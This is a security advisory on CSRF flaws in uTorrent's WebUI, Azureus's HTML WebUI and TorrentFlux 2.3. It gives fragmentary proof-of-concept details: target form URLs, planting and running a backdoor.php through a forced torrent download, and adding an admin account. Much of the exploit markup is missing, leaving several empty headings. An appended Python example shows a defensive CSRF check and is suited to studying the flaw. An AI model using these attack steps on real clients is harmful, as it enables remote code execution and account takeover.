BitTorrent Clients and CSRF

The following are proof-of-concept exploits against three BitTorrent clients: uTorrent's WebUI, Azureus's "HTML WebUI", and TorrentFlux.

More information:

TorrentFlux v2.3 (Latest)

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
You do not have to know a password to access this folder, but you will have to know the username.

action="http://localhost/torrentflux_2.3/html/index.php"
value="http://localhost/backdoor.php.torrent"

Add an administrative account:

action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser"

uTorrent's WebUI is also affected:

Force file download:

Change uTorrent administrative login information:

After the username or password has been changed, the browser must re-authenticate.

So is Azureus's HTML WebUI:

Force file download:
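
A server-side check that would refuse the cross-site form submissions described above, as an added example that is not part of the original advisory or of any of the three projects' code. It is written in Python for illustration; TRUSTED_ORIGIN, the csrf_token field name, and the sample requests are assumptions constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the origin the WebUI is served from (the advisory uses localhost).
TRUSTED_ORIGIN = "http://localhost"


def issue_token(session_secret: bytes, session_id: str) -> str:
    """Per-session token the server embeds as a hidden field in its own forms."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(header_value: str) -> str:
    """Reduce an Origin or Referer value to scheme://host[:port] ('' if unusable)."""
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def check_request(method, headers, form, session_secret, session_id):
    """Decide whether a state-changing request (add torrent, add user) may proceed."""
    if method != "POST":
        return False, "state change must use POST"
    source = headers.get("Origin") or headers.get("Referer") or ""
    if origin_of(source) != TRUSTED_ORIGIN:
        return False, "cross-site or missing Origin/Referer"
    expected = issue_token(session_secret, session_id)
    supplied = form.get("csrf_token", "")  # hypothetical field name
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    secret, sid = secrets.token_bytes(32), "session-1"  # constructed sample values
    # Constructed requests: one submitted by a third-party page, one by the WebUI.
    forged = ("POST", {"Origin": "http://other-site.example"}, {"user": "new"})
    genuine = ("POST", {"Origin": TRUSTED_ORIGIN},
               {"user": "new", "csrf_token": issue_token(secret, sid)})
    for name, (method, headers, form) in (("forged", forged), ("genuine", genuine)):
        print(name, check_request(method, headers, form, secret, sid))
```

The token check is what stops a forged request even when the header check is bypassed or the headers are stripped, because a third-party page cannot read the value the WebUI put in its own form.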
